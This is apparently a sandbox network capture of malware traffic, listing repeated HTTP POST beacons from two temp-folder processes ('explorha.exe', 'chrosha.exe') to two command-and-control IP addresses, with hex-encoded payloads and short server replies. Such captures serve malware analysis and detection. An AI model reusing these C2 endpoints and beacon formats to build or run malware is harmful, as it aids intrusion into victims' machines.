Timestamp: Apr 19, 2024 03:33:05.892870903 CEST | Bytes transferred: 155 | Direction: OUT | Data:
POST /enigma/index.php HTTP/1.1
                                                                                                                                                                                                                                      Content-Type: application/x-www-form-urlencoded
                                                                                                                                                                                                                                      Host: 193.233.132.167
                                                                                                                                                                                                                                      Content-Length: 4
                                                                                                                                                                                                                                      Cache-Control: no-cache
                                                                                                                                                                                                                                      Data Raw: 73 74 3d 73
                                                                                                                                                                                                                                      Data Ascii: st=s
Timestamp: Apr 19, 2024 03:33:06.133955002 CEST | Bytes transferred: 197 | Direction: IN | Data:
HTTP/1.1 200 OK
                                                                                                                                                                                                                                      Server: nginx/1.18.0 (Ubuntu)
                                                                                                                                                                                                                                      Date: Fri, 19 Apr 2024 01:33:06 GMT
                                                                                                                                                                                                                                      Content-Type: text/html; charset=UTF-8
                                                                                                                                                                                                                                      Transfer-Encoding: chunked
                                                                                                                                                                                                                                      Connection: keep-alive
                                                                                                                                                                                                                                      Data Raw: 38 0d 0a 20 3c 63 3e 33 3c 64 3e 0d 0a 30 0d 0a 0d 0a
                                                                                                                                                                                                                                      Data Ascii: 8 <c>3<d>0


Session ID: 680 | Source IP: 192.168.2.5 | Source Port: 50526 | Destination IP: 193.233.132.56 | Destination Port: 80 | PID: 4484 | Process: C:\Users\user\AppData\Local\Temp\09fd851a4f\explorha.exe
Timestamp: Apr 19, 2024 03:33:06.084527969 CEST | Bytes transferred: 312 | Direction: OUT | Data:
POST /Pneh2sXQk0/index.php HTTP/1.1
                                                                                                                                                                                                                                      Content-Type: application/x-www-form-urlencoded
                                                                                                                                                                                                                                      Host: 193.233.132.56
                                                                                                                                                                                                                                      Content-Length: 156
                                                                                                                                                                                                                                      Cache-Control: no-cache
                                                                                                                                                                                                                                      Data Raw: 72 3d 41 42 31 45 39 44 32 37 35 41 46 38 38 31 42 43 46 37 35 34 35 46 46 43 39 45 35 42 37 30 41 39 43 30 31 44 45 32 30 41 44 43 32 33 38 43 41 39 46 30 42 45 32 35 41 42 41 35 46 39 45 36 34 35 37 38 42 34 42 35 36 34 37 41 32 38 38 45 37 46 38 31 30 30 38 44 41 39 36 41 45 36 43 37 46 30 41 46 34 33 43 46 46 39 46 44 33 33 43 32 30 44 42 46 42 30 30 36 31 36 35 42 37 30 33 31 38 42 42 43 30 30 36 35 43 30 44 35 41 39 35 39 36 37 44 46 34 41 30 36 30 33 33 32
                                                                                                                                                                                                                                      Data Ascii: r=AB1E9D275AF881BCF7545FFC9E5B70A9C01DE20ADC238CA9F0BE25ABA5F9E64578B4B5647A288E7F81008DA96AE6C7F0AF43CFF9FD33C20DBFB006165B70318BBC0065C0D5A95967DF4A060332
Timestamp: Apr 19, 2024 03:33:06.334680080 CEST | Bytes transferred: 196 | Direction: IN | Data:
HTTP/1.1 200 OK
                                                                                                                                                                                                                                      Server: nginx/1.18.0 (Ubuntu)
                                                                                                                                                                                                                                      Date: Fri, 19 Apr 2024 01:33:06 GMT
                                                                                                                                                                                                                                      Content-Type: text/html; charset=UTF-8
                                                                                                                                                                                                                                      Transfer-Encoding: chunked
                                                                                                                                                                                                                                      Connection: keep-alive
                                                                                                                                                                                                                                      Data Raw: 37 0d 0a 20 3c 63 3e 3c 64 3e 0d 0a 30 0d 0a 0d 0a
                                                                                                                                                                                                                                      Data Ascii: 7 <c><d>0


Session ID: 681 | Source IP: 192.168.2.5 | Source Port: 50527 | Destination IP: 193.233.132.167 | Destination Port: 80 | PID: 8024 | Process: C:\Users\user\AppData\Local\Temp\4d0ab15804\chrosha.exe
Timestamp: Apr 19, 2024 03:33:06.386539936 CEST | Bytes transferred: 309 | Direction: OUT | Data:
POST /enigma/index.php HTTP/1.1
                                                                                                                                                                                                                                      Content-Type: application/x-www-form-urlencoded
                                                                                                                                                                                                                                      Host: 193.233.132.167
                                                                                                                                                                                                                                      Content-Length: 156
                                                                                                                                                                                                                                      Cache-Control: no-cache
                                                                                                                                                                                                                                      Data Raw: 72 3d 39 36 33 38 44 33 34 31 35 46 37 37 38 41 31 45 33 31 46 46 43 31 46 34 42 46 39 31 33 32 42 42 39 45 36 32 35 34 45 32 41 44 36 32 37 42 35 30 44 37 39 42 46 30 34 30 30 43 42 42 32 42 42 38 31 32 37 38 35 30 39 43 30 35 42 45 41 33 36 36 39 41 35 32 37 37 37 46 41 36 31 33 35 34 35 37 33 46 46 34 45 36 34 31 32 41 37 34 36 35 41 31 46 46 34 39 30 30 42 32 44 45 46 33 43 30 41 30 41 41 39 42 43 32 32 43 38 44 31 35 39 32 34 35 35 45 37 42 35 38 30 39 41 44
                                                                                                                                                                                                                                      Data Ascii: r=9638D3415F778A1E31FFC1F4BF9132BB9E6254E2AD627B50D79BF0400CBB2BB81278509C05BEA3669A52777FA61354573FF4E6412A7465A1FF4900B2DEF3C0A0AA9BC22C8D1592455E7B5809AD
Apr 19, 2024 03:33:06.640326977 CEST | 196 | IN | HTTP/1.1 200 OK
                                                                                                                                                                                                                                      Server: nginx/1.18.0 (Ubuntu)
                                                                                                                                                                                                                                      Date: Fri, 19 Apr 2024 01:33:06 GMT
                                                                                                                                                                                                                                      Content-Type: text/html; charset=UTF-8
                                                                                                                                                                                                                                      Transfer-Encoding: chunked
                                                                                                                                                                                                                                      Connection: keep-alive
                                                                                                                                                                                                                                      Data Raw: 37 0d 0a 20 3c 63 3e 3c 64 3e 0d 0a 30 0d 0a 0d 0a
                                                                                                                                                                                                                                      Data Ascii: 7 <c><d>0


Session ID | Source IP | Source Port | Destination IP | Destination Port | PID | Process
682 | 192.168.2.5 | 50528 | 193.233.132.56 | 80 | 4484 | C:\Users\user\AppData\Local\Temp\09fd851a4f\explorha.exe
Timestamp | Bytes transferred | Direction | Data
Apr 19, 2024 03:33:06.697885990 CEST | 158 | OUT | POST /Pneh2sXQk0/index.php HTTP/1.1
                                                                                                                                                                                                                                      Content-Type: application/x-www-form-urlencoded
                                                                                                                                                                                                                                      Host: 193.233.132.56
                                                                                                                                                                                                                                      Content-Length: 4
                                                                                                                                                                                                                                      Cache-Control: no-cache
                                                                                                                                                                                                                                      Data Raw: 73 74 3d 73
                                                                                                                                                                                                                                      Data Ascii: st=s
Apr 19, 2024 03:33:06.945637941 CEST | 219 | IN | HTTP/1.1 200 OK
                                                                                                                                                                                                                                      Server: nginx/1.18.0 (Ubuntu)
                                                                                                                                                                                                                                      Date: Fri, 19 Apr 2024 01:33:06 GMT
                                                                                                                                                                                                                                      Content-Type: text/html; charset=UTF-8
                                                                                                                                                                                                                                      Transfer-Encoding: chunked
                                                                                                                                                                                                                                      Connection: keep-alive
                                                                                                                                                                                                                                      Refresh: 0; url = Login.php
                                                                                                                                                                                                                                      Data Raw: 31 0d 0a 20 0d 0a 30 0d 0a 0d 0a
                                                                                                                                                                                                                                      Data Ascii: 1 0


Session ID | Source IP | Source Port | Destination IP | Destination Port | PID | Process
683 | 192.168.2.5 | 50529 | 193.233.132.167 | 80 | 8024 | C:\Users\user\AppData\Local\Temp\4d0ab15804\chrosha.exe
Timestamp | Bytes transferred | Direction | Data
Apr 19, 2024 03:33:06.987684965 CEST | 155 | OUT | POST /enigma/index.php HTTP/1.1
                                                                                                                                                                                                                                      Content-Type: application/x-www-form-urlencoded
                                                                                                                                                                                                                                      Host: 193.233.132.167
                                                                                                                                                                                                                                      Content-Length: 4
                                                                                                                                                                                                                                      Cache-Control: no-cache
                                                                                                                                                                                                                                      Data Raw: 73 74 3d 73
                                                                                                                                                                                                                                      Data Ascii: st=s
Apr 19, 2024 03:33:07.230201006 CEST | 197 | IN | HTTP/1.1 200 OK
                                                                                                                                                                                                                                      Server: nginx/1.18.0 (Ubuntu)
                                                                                                                                                                                                                                      Date: Fri, 19 Apr 2024 01:33:07 GMT
                                                                                                                                                                                                                                      Content-Type: text/html; charset=UTF-8
                                                                                                                                                                                                                                      Transfer-Encoding: chunked
                                                                                                                                                                                                                                      Connection: keep-alive
                                                                                                                                                                                                                                      Data Raw: 38 0d 0a 20 3c 63 3e 33 3c 64 3e 0d 0a 30 0d 0a 0d 0a
                                                                                                                                                                                                                                      Data Ascii: 8 <c>3<d>0


Session ID | Source IP | Source Port | Destination IP | Destination Port | PID | Process
684 | 192.168.2.5 | 50530 | 193.233.132.56 | 80 | 4484 | C:\Users\user\AppData\Local\Temp\09fd851a4f\explorha.exe
Timestamp | Bytes transferred | Direction | Data
Apr 19, 2024 03:33:07.196623087 CEST | 312 | OUT | POST /Pneh2sXQk0/index.php HTTP/1.1
                                                                                                                                                                                                                                      Content-Type: application/x-www-form-urlencoded
                                                                                                                                                                                                                                      Host: 193.233.132.56
                                                                                                                                                                                                                                      Content-Length: 156
                                                                                                                                                                                                                                      Cache-Control: no-cache
                                                                                                                                                                                                                                      Data Raw: 72 3d 41 42 31 45 39 44 32 37 35 41 46 38 38 31 42 43 46 37 35 34 35 46 46 43 39 45 35 42 37 30 41 39 43 30 31 44 45 32 30 41 44 43 32 33 38 43 41 39 46 30 42 45 32 35 41 42 41 35 46 39 45 36 34 35 37 38 42 34 42 35 36 34 37 41 32 38 38 45 37 46 38 31 30 30 38 44 41 39 36 41 45 36 43 37 46 30 41 46 34 33 43 46 46 39 46 44 33 33 43 32 30 44 42 46 42 30 30 36 31 36 35 42 37 30 33 31 38 42 42 43 30 30 36 35 43 30 44 35 41 39 35 39 36 37 44 46 34 41 30 36 30 33 33 32
                                                                                                                                                                                                                                      Data Ascii: r=AB1E9D275AF881BCF7545FFC9E5B70A9C01DE20ADC238CA9F0BE25ABA5F9E64578B4B5647A288E7F81008DA96AE6C7F0AF43CFF9FD33C20DBFB006165B70318BBC0065C0D5A95967DF4A060332
Apr 19, 2024 03:33:07.446541071 CEST | 196 | IN | HTTP/1.1 200 OK
                                                                                                                                                                                                                                      Server: nginx/1.18.0 (Ubuntu)
                                                                                                                                                                                                                                      Date: Fri, 19 Apr 2024 01:33:07 GMT
                                                                                                                                                                                                                                      Content-Type: text/html; charset=UTF-8
                                                                                                                                                                                                                                      Transfer-Encoding: chunked
                                                                                                                                                                                                                                      Connection: keep-alive
                                                                                                                                                                                                                                      Data Raw: 37 0d 0a 20 3c 63 3e 3c 64 3e 0d 0a 30 0d 0a 0d 0a
                                                                                                                                                                                                                                      Data Ascii: 7 <c><d>0


Session ID | Source IP | Source Port | Destination IP | Destination Port | PID | Process
685 | 192.168.2.5 | 50531 | 193.233.132.167 | 80 | 8024 | C:\Users\user\AppData\Local\Temp\4d0ab15804\chrosha.exe
Timestamp | Bytes transferred | Direction | Data
Apr 19, 2024 03:33:07.481255054 CEST | 309 | OUT | POST /enigma/index.php HTTP/1.1
                                                                                                                                                                                                                                      Content-Type: application/x-www-form-urlencoded
                                                                                                                                                                                                                                      Host: 193.233.132.167
                                                                                                                                                                                                                                      Content-Length: 156
                                                                                                                                                                                                                                      Cache-Control: no-cache
                                                                                                                                                                                                                                      Data Raw: 72 3d 39 36 33 38 44 33 34 31 35 46 37 37 38 41 31 45 33 31 46 46 43 31 46 34 42 46 39 31 33 32 42 42 39 45 36 32 35 34 45 32 41 44 36 32 37 42 35 30 44 37 39 42 46 30 34 30 30 43 42 42 32 42 42 38 31 32 37 38 35 30 39 43 30 35 42 45 41 33 36 36 39 41 35 32 37 37 37 46 41 36 31 33 35 34 35 37 33 46 46 34 45 36 34 31 32 41 37 34 36 35 41 31 46 46 34 39 30 30 42 32 44 45 46 33 43 30 41 30 41 41 39 42 43 32 32 43 38 44 31 35 39 32 34 35 35 45 37 42 35 38 30 39 41 44
                                                                                                                                                                                                                                      Data Ascii: r=9638D3415F778A1E31FFC1F4BF9132BB9E6254E2AD627B50D79BF0400CBB2BB81278509C05BEA3669A52777FA61354573FF4E6412A7465A1FF4900B2DEF3C0A0AA9BC22C8D1592455E7B5809AD
Apr 19, 2024 03:33:07.734349966 CEST | 196 | IN | HTTP/1.1 200 OK
                                                                                                                                                                                                                                      Server: nginx/1.18.0 (Ubuntu)
                                                                                                                                                                                                                                      Date: Fri, 19 Apr 2024 01:33:07 GMT
                                                                                                                                                                                                                                      Content-Type: text/html; charset=UTF-8
                                                                                                                                                                                                                                      Transfer-Encoding: chunked
                                                                                                                                                                                                                                      Connection: keep-alive
                                                                                                                                                                                                                                      Data Raw: 37 0d 0a 20 3c 63 3e 3c 64 3e 0d 0a 30 0d 0a 0d 0a
                                                                                                                                                                                                                                      Data Ascii: 7 <c><d>0


Session ID | Source IP | Source Port | Destination IP | Destination Port | PID | Process
686 | 192.168.2.5 | 50532 | 193.233.132.56 | 80 | 4484 | C:\Users\user\AppData\Local\Temp\09fd851a4f\explorha.exe
Timestamp | Bytes transferred | Direction | Data
Apr 19, 2024 03:33:07.806180954 CEST | 158 | OUT | POST /Pneh2sXQk0/index.php HTTP/1.1
                                                                                                                                                                                                                                      Content-Type: application/x-www-form-urlencoded
                                                                                                                                                                                                                                      Host: 193.233.132.56
                                                                                                                                                                                                                                      Content-Length: 4
                                                                                                                                                                                                                                      Cache-Control: no-cache
                                                                                                                                                                                                                                      Data Raw: 73 74 3d 73
                                                                                                                                                                                                                                      Data Ascii: st=s
Apr 19, 2024 03:33:08.054105997 CEST | 219 | IN | HTTP/1.1 200 OK
                                                                                                                                                                                                                                      Server: nginx/1.18.0 (Ubuntu)
                                                                                                                                                                                                                                      Date: Fri, 19 Apr 2024 01:33:07 GMT
                                                                                                                                                                                                                                      Content-Type: text/html; charset=UTF-8
                                                                                                                                                                                                                                      Transfer-Encoding: chunked
                                                                                                                                                                                                                                      Connection: keep-alive
                                                                                                                                                                                                                                      Refresh: 0; url = Login.php
                                                                                                                                                                                                                                      Data Raw: 31 0d 0a 20 0d 0a 30 0d 0a 0d 0a
                                                                                                                                                                                                                                      Data Ascii: 1 0


Session ID | Source IP | Source Port | Destination IP | Destination Port | PID | Process
687 | 192.168.2.5 | 50533 | 193.233.132.167 | 80 | 8024 | C:\Users\user\AppData\Local\Temp\4d0ab15804\chrosha.exe
Timestamp | Bytes transferred | Direction | Data
Apr 19, 2024 03:33:08.082968950 CEST | 155 | OUT | POST /enigma/index.php HTTP/1.1
                                                                                                                                                                                                                                      Content-Type: application/x-www-form-urlencoded
                                                                                                                                                                                                                                      Host: 193.233.132.167
                                                                                                                                                                                                                                      Content-Length: 4
                                                                                                                                                                                                                                      Cache-Control: no-cache
                                                                                                                                                                                                                                      Data Raw: 73 74 3d 73
                                                                                                                                                                                                                                      Data Ascii: st=s
Apr 19, 2024 03:33:08.326955080 CEST | 197 | IN | HTTP/1.1 200 OK
                                                                                                                                                                                                                                      Server: nginx/1.18.0 (Ubuntu)
                                                                                                                                                                                                                                      Date: Fri, 19 Apr 2024 01:33:08 GMT
                                                                                                                                                                                                                                      Content-Type: text/html; charset=UTF-8
                                                                                                                                                                                                                                      Transfer-Encoding: chunked
                                                                                                                                                                                                                                      Connection: keep-alive
                                                                                                                                                                                                                                      Data Raw: 38 0d 0a 20 3c 63 3e 33 3c 64 3e 0d 0a 30 0d 0a 0d 0a
                                                                                                                                                                                                                                      Data Ascii: 8 <c>3<d>0


Session ID | Source IP | Source Port | Destination IP | Destination Port | PID | Process
688 | 192.168.2.5 | 50534 | 193.233.132.56 | 80 | 4484 | C:\Users\user\AppData\Local\Temp\09fd851a4f\explorha.exe
Timestamp | Bytes transferred | Direction | Data
Apr 19, 2024 03:33:08.307384014 CEST | 312 | OUT | POST /Pneh2sXQk0/index.php HTTP/1.1
                                                                                                                                                                                                                                      Content-Type: application/x-www-form-urlencoded
                                                                                                                                                                                                                                      Host: 193.233.132.56
                                                                                                                                                                                                                                      Content-Length: 156
                                                                                                                                                                                                                                      Cache-Control: no-cache
                                                                                                                                                                                                                                      Data Ascii: r=AB1E9D275AF881BCF7545FFC9E5B70A9C01DE20ADC238CA9F0BE25ABA5F9E64578B4B5647A288E7F81008DA96AE6C7F0AF43CFF9FD33C20DBFB006165B70318BBC0065C0D5A95967DF4A060332
Apr 19, 2024 03:33:08.561686039 CEST | 196 | IN | HTTP/1.1 200 OK
                                                                                                                                                                                                                                      Server: nginx/1.18.0 (Ubuntu)
                                                                                                                                                                                                                                      Date: Fri, 19 Apr 2024 01:33:08 GMT
                                                                                                                                                                                                                                      Content-Type: text/html; charset=UTF-8
                                                                                                                                                                                                                                      Transfer-Encoding: chunked
                                                                                                                                                                                                                                      Connection: keep-alive
                                                                                                                                                                                                                                      Data Raw: 37 0d 0a 20 3c 63 3e 3c 64 3e 0d 0a 30 0d 0a 0d 0a
                                                                                                                                                                                                                                      Data Ascii: 7 <c><d>0


Session ID | Source IP | Source Port | Destination IP | Destination Port | PID | Process
689 | 192.168.2.5 | 50535 | 193.233.132.167 | 80 | 8024 | C:\Users\user\AppData\Local\Temp\4d0ab15804\chrosha.exe
Timestamp | Bytes transferred | Direction | Data
Apr 19, 2024 03:33:08.577044010 CEST | 309 | OUT | POST /enigma/index.php HTTP/1.1
                                                                                                                                                                                                                                      Content-Type: application/x-www-form-urlencoded
                                                                                                                                                                                                                                      Host: 193.233.132.167
                                                                                                                                                                                                                                      Content-Length: 156
                                                                                                                                                                                                                                      Cache-Control: no-cache
                                                                                                                                                                                                                                      Data Ascii: r=9638D3415F778A1E31FFC1F4BF9132BB9E6254E2AD627B50D79BF0400CBB2BB81278509C05BEA3669A52777FA61354573FF4E6412A7465A1FF4900B2DEF3C0A0AA9BC22C8D1592455E7B5809AD
Apr 19, 2024 03:33:08.828504086 CEST | 196 | IN | HTTP/1.1 200 OK
                                                                                                                                                                                                                                      Server: nginx/1.18.0 (Ubuntu)
                                                                                                                                                                                                                                      Date: Fri, 19 Apr 2024 01:33:08 GMT
                                                                                                                                                                                                                                      Content-Type: text/html; charset=UTF-8
                                                                                                                                                                                                                                      Transfer-Encoding: chunked
                                                                                                                                                                                                                                      Connection: keep-alive
                                                                                                                                                                                                                                      Data Raw: 37 0d 0a 20 3c 63 3e 3c 64 3e 0d 0a 30 0d 0a 0d 0a
                                                                                                                                                                                                                                      Data Ascii: 7 <c><d>0


Session ID | Source IP | Source Port | Destination IP | Destination Port | PID | Process
690 | 192.168.2.5 | 50536 | 193.233.132.56 | 80 | 4484 | C:\Users\user\AppData\Local\Temp\09fd851a4f\explorha.exe
Timestamp | Bytes transferred | Direction | Data
Apr 19, 2024 03:33:08.931102037 CEST | 158 | OUT | POST /Pneh2sXQk0/index.php HTTP/1.1
                                                                                                                                                                                                                                      Content-Type: application/x-www-form-urlencoded
                                                                                                                                                                                                                                      Host: 193.233.132.56
                                                                                                                                                                                                                                      Content-Length: 4
                                                                                                                                                                                                                                      Cache-Control: no-cache
                                                                                                                                                                                                                                      Data Raw: 73 74 3d 73
                                                                                                                                                                                                                                      Data Ascii: st=s
Apr 19, 2024 03:33:09.180078030 CEST | 219 | IN | HTTP/1.1 200 OK
                                                                                                                                                                                                                                      Server: nginx/1.18.0 (Ubuntu)
                                                                                                                                                                                                                                      Date: Fri, 19 Apr 2024 01:33:09 GMT
                                                                                                                                                                                                                                      Content-Type: text/html; charset=UTF-8
                                                                                                                                                                                                                                      Transfer-Encoding: chunked
                                                                                                                                                                                                                                      Connection: keep-alive
                                                                                                                                                                                                                                      Refresh: 0; url = Login.php
                                                                                                                                                                                                                                      Data Raw: 31 0d 0a 20 0d 0a 30 0d 0a 0d 0a
                                                                                                                                                                                                                                      Data Ascii: 1 0


Session ID | Source IP | Source Port | Destination IP | Destination Port | PID | Process
691 | 192.168.2.5 | 50537 | 193.233.132.167 | 80 | 8024 | C:\Users\user\AppData\Local\Temp\4d0ab15804\chrosha.exe
Timestamp | Bytes transferred | Direction | Data
Apr 19, 2024 03:33:09.201700926 CEST | 155 | OUT | POST /enigma/index.php HTTP/1.1
                                                                                                                                                                                                                                      Content-Type: application/x-www-form-urlencoded
                                                                                                                                                                                                                                      Host: 193.233.132.167
                                                                                                                                                                                                                                      Content-Length: 4
                                                                                                                                                                                                                                      Cache-Control: no-cache
                                                                                                                                                                                                                                      Data Raw: 73 74 3d 73
                                                                                                                                                                                                                                      Data Ascii: st=s
Apr 19, 2024 03:33:09.449883938 CEST | 197 | IN | HTTP/1.1 200 OK
                                                                                                                                                                                                                                      Server: nginx/1.18.0 (Ubuntu)
                                                                                                                                                                                                                                      Date: Fri, 19 Apr 2024 01:33:09 GMT
                                                                                                                                                                                                                                      Content-Type: text/html; charset=UTF-8
                                                                                                                                                                                                                                      Transfer-Encoding: chunked
                                                                                                                                                                                                                                      Connection: keep-alive
                                                                                                                                                                                                                                      Data Raw: 38 0d 0a 20 3c 63 3e 33 3c 64 3e 0d 0a 30 0d 0a 0d 0a
                                                                                                                                                                                                                                      Data Ascii: 8 <c>3<d>0


Session ID | Source IP | Source Port | Destination IP | Destination Port | PID | Process
692 | 192.168.2.5 | 50538 | 193.233.132.56 | 80 | 4484 | C:\Users\user\AppData\Local\Temp\09fd851a4f\explorha.exe
Timestamp | Bytes transferred | Direction | Data
Apr 19, 2024 03:33:09.434240103 CEST | 312 | OUT | POST /Pneh2sXQk0/index.php HTTP/1.1
                                                                                                                                                                                                                                      Content-Type: application/x-www-form-urlencoded
                                                                                                                                                                                                                                      Host: 193.233.132.56
                                                                                                                                                                                                                                      Content-Length: 156
                                                                                                                                                                                                                                      Cache-Control: no-cache
                                                                                                                                                                                                                                      Data Ascii: r=AB1E9D275AF881BCF7545FFC9E5B70A9C01DE20ADC238CA9F0BE25ABA5F9E64578B4B5647A288E7F81008DA96AE6C7F0AF43CFF9FD33C20DBFB006165B70318BBC0065C0D5A95967DF4A060332
Apr 19, 2024 03:33:09.687099934 CEST | 196 | IN | HTTP/1.1 200 OK
                                                                                                                                                                                                                                      Server: nginx/1.18.0 (Ubuntu)
                                                                                                                                                                                                                                      Date: Fri, 19 Apr 2024 01:33:09 GMT
                                                                                                                                                                                                                                      Content-Type: text/html; charset=UTF-8
                                                                                                                                                                                                                                      Transfer-Encoding: chunked
                                                                                                                                                                                                                                      Connection: keep-alive
                                                                                                                                                                                                                                      Data Raw: 37 0d 0a 20 3c 63 3e 3c 64 3e 0d 0a 30 0d 0a 0d 0a
                                                                                                                                                                                                                                      Data Ascii: 7 <c><d>0


Session ID | Source IP | Source Port | Destination IP | Destination Port | PID | Process
693 | 192.168.2.5 | 50539 | 193.233.132.167 | 80 | 8024 | C:\Users\user\AppData\Local\Temp\4d0ab15804\chrosha.exe
Timestamp | Bytes transferred | Direction | Data
Apr 19, 2024 03:33:09.699390888 CEST | 309 | OUT | POST /enigma/index.php HTTP/1.1
                                                                                                                                                                                                                                      Content-Type: application/x-www-form-urlencoded
                                                                                                                                                                                                                                      Host: 193.233.132.167
                                                                                                                                                                                                                                      Content-Length: 156
                                                                                                                                                                                                                                      Cache-Control: no-cache
                                                                                                                                                                                                                                      Data Ascii: r=9638D3415F778A1E31FFC1F4BF9132BB9E6254E2AD627B50D79BF0400CBB2BB81278509C05BEA3669A52777FA61354573FF4E6412A7465A1FF4900B2DEF3C0A0AA9BC22C8D1592455E7B5809AD
Apr 19, 2024 03:33:09.949911118 CEST | 196 | IN | HTTP/1.1 200 OK
Server: nginx/1.18.0 (Ubuntu)
Date: Fri, 19 Apr 2024 01:33:09 GMT
Content-Type: text/html; charset=UTF-8
Transfer-Encoding: chunked
Connection: keep-alive
Data Raw: 37 0d 0a 20 3c 63 3e 3c 64 3e 0d 0a 30 0d 0a 0d 0a
Data Ascii: 7 <c><d>0


Session ID | Source IP | Source Port | Destination IP | Destination Port | PID | Process
694 | 192.168.2.5 | 50540 | 193.233.132.56 | 80 | 4484 | C:\Users\user\AppData\Local\Temp\09fd851a4f\explorha.exe
Timestamp | Bytes transferred | Direction | Data
Apr 19, 2024 03:33:10.042725086 CEST | 158 | OUT | POST /Pneh2sXQk0/index.php HTTP/1.1
Content-Type: application/x-www-form-urlencoded
Host: 193.233.132.56
Content-Length: 4
Cache-Control: no-cache
Data Raw: 73 74 3d 73
Data Ascii: st=s
Apr 19, 2024 03:33:10.291435003 CEST | 219 | IN | HTTP/1.1 200 OK
Server: nginx/1.18.0 (Ubuntu)
Date: Fri, 19 Apr 2024 01:33:10 GMT
Content-Type: text/html; charset=UTF-8
Transfer-Encoding: chunked
Connection: keep-alive
Refresh: 0; url = Login.php
Data Raw: 31 0d 0a 20 0d 0a 30 0d 0a 0d 0a
Data Ascii: 1 0


Session ID | Source IP | Source Port | Destination IP | Destination Port | PID | Process
695 | 192.168.2.5 | 50541 | 193.233.132.167 | 80 | 8024 | C:\Users\user\AppData\Local\Temp\4d0ab15804\chrosha.exe
Timestamp | Bytes transferred | Direction | Data
Apr 19, 2024 03:33:10.303426981 CEST | 155 | OUT | POST /enigma/index.php HTTP/1.1
Content-Type: application/x-www-form-urlencoded
Host: 193.233.132.167
Content-Length: 4
Cache-Control: no-cache
Data Raw: 73 74 3d 73
Data Ascii: st=s
Apr 19, 2024 03:33:10.548979998 CEST | 197 | IN | HTTP/1.1 200 OK
Server: nginx/1.18.0 (Ubuntu)
Date: Fri, 19 Apr 2024 01:33:10 GMT
Content-Type: text/html; charset=UTF-8
Transfer-Encoding: chunked
Connection: keep-alive
Data Raw: 38 0d 0a 20 3c 63 3e 33 3c 64 3e 0d 0a 30 0d 0a 0d 0a
Data Ascii: 8 <c>3<d>0


Session ID | Source IP | Source Port | Destination IP | Destination Port | PID | Process
696 | 192.168.2.5 | 50542 | 193.233.132.56 | 80 | 4484 | C:\Users\user\AppData\Local\Temp\09fd851a4f\explorha.exe
Timestamp | Bytes transferred | Direction | Data
Apr 19, 2024 03:33:10.539582968 CEST | 312 | OUT | POST /Pneh2sXQk0/index.php HTTP/1.1
Content-Type: application/x-www-form-urlencoded
Host: 193.233.132.56
Content-Length: 156
Cache-Control: no-cache
                                                                                                                                                                                                                                      Data Ascii: r=AB1E9D275AF881BCF7545FFC9E5B70A9C01DE20ADC238CA9F0BE25ABA5F9E64578B4B5647A288E7F81008DA96AE6C7F0AF43CFF9FD33C20DBFB006165B70318BBC0065C0D5A95967DF4A060332
Apr 19, 2024 03:33:10.788640976 CEST | 196 | IN | HTTP/1.1 200 OK
Server: nginx/1.18.0 (Ubuntu)
Date: Fri, 19 Apr 2024 01:33:10 GMT
Content-Type: text/html; charset=UTF-8
Transfer-Encoding: chunked
Connection: keep-alive
Data Raw: 37 0d 0a 20 3c 63 3e 3c 64 3e 0d 0a 30 0d 0a 0d 0a
Data Ascii: 7 <c><d>0


Session ID | Source IP | Source Port | Destination IP | Destination Port | PID | Process
697 | 192.168.2.5 | 50543 | 193.233.132.167 | 80 | 8024 | C:\Users\user\AppData\Local\Temp\4d0ab15804\chrosha.exe
Timestamp | Bytes transferred | Direction | Data
Apr 19, 2024 03:33:10.803433895 CEST | 309 | OUT | POST /enigma/index.php HTTP/1.1
Content-Type: application/x-www-form-urlencoded
Host: 193.233.132.167
Content-Length: 156
Cache-Control: no-cache
                                                                                                                                                                                                                                      Data Ascii: r=9638D3415F778A1E31FFC1F4BF9132BB9E6254E2AD627B50D79BF0400CBB2BB81278509C05BEA3669A52777FA61354573FF4E6412A7465A1FF4900B2DEF3C0A0AA9BC22C8D1592455E7B5809AD
Apr 19, 2024 03:33:11.059469938 CEST | 196 | IN | HTTP/1.1 200 OK
Server: nginx/1.18.0 (Ubuntu)
Date: Fri, 19 Apr 2024 01:33:10 GMT
Content-Type: text/html; charset=UTF-8
Transfer-Encoding: chunked
Connection: keep-alive
Data Raw: 37 0d 0a 20 3c 63 3e 3c 64 3e 0d 0a 30 0d 0a 0d 0a
Data Ascii: 7 <c><d>0


Session ID | Source IP | Source Port | Destination IP | Destination Port | PID | Process
698 | 192.168.2.5 | 50544 | 193.233.132.56 | 80 | 4484 | C:\Users\user\AppData\Local\Temp\09fd851a4f\explorha.exe
Timestamp | Bytes transferred | Direction | Data
Apr 19, 2024 03:33:11.149333000 CEST | 158 | OUT | POST /Pneh2sXQk0/index.php HTTP/1.1
Content-Type: application/x-www-form-urlencoded
Host: 193.233.132.56
Content-Length: 4
Cache-Control: no-cache
Data Raw: 73 74 3d 73
Data Ascii: st=s
Apr 19, 2024 03:33:11.396939993 CEST | 219 | IN | HTTP/1.1 200 OK
Server: nginx/1.18.0 (Ubuntu)
Date: Fri, 19 Apr 2024 01:33:11 GMT
Content-Type: text/html; charset=UTF-8
Transfer-Encoding: chunked
Connection: keep-alive
Refresh: 0; url = Login.php
Data Raw: 31 0d 0a 20 0d 0a 30 0d 0a 0d 0a
Data Ascii: 1 0


Session ID | Source IP | Source Port | Destination IP | Destination Port | PID | Process
699 | 192.168.2.5 | 50545 | 193.233.132.167 | 80 | 8024 | C:\Users\user\AppData\Local\Temp\4d0ab15804\chrosha.exe
Timestamp | Bytes transferred | Direction | Data
Apr 19, 2024 03:33:11.417512894 CEST | 155 | OUT | POST /enigma/index.php HTTP/1.1
Content-Type: application/x-www-form-urlencoded
Host: 193.233.132.167
Content-Length: 4
Cache-Control: no-cache
Data Raw: 73 74 3d 73
Data Ascii: st=s
Apr 19, 2024 03:33:11.663871050 CEST | 197 | IN | HTTP/1.1 200 OK
Server: nginx/1.18.0 (Ubuntu)
Date: Fri, 19 Apr 2024 01:33:11 GMT
Content-Type: text/html; charset=UTF-8
Transfer-Encoding: chunked
Connection: keep-alive
Data Raw: 38 0d 0a 20 3c 63 3e 33 3c 64 3e 0d 0a 30 0d 0a 0d 0a
Data Ascii: 8 <c>3<d>0


Session ID | Source IP | Source Port | Destination IP | Destination Port | PID | Process
700 | 192.168.2.5 | 50546 | 193.233.132.56 | 80 | 4484 | C:\Users\user\AppData\Local\Temp\09fd851a4f\explorha.exe
Timestamp | Bytes transferred | Direction | Data
Apr 19, 2024 03:33:11.652049065 CEST | 312 | OUT | POST /Pneh2sXQk0/index.php HTTP/1.1
Content-Type: application/x-www-form-urlencoded
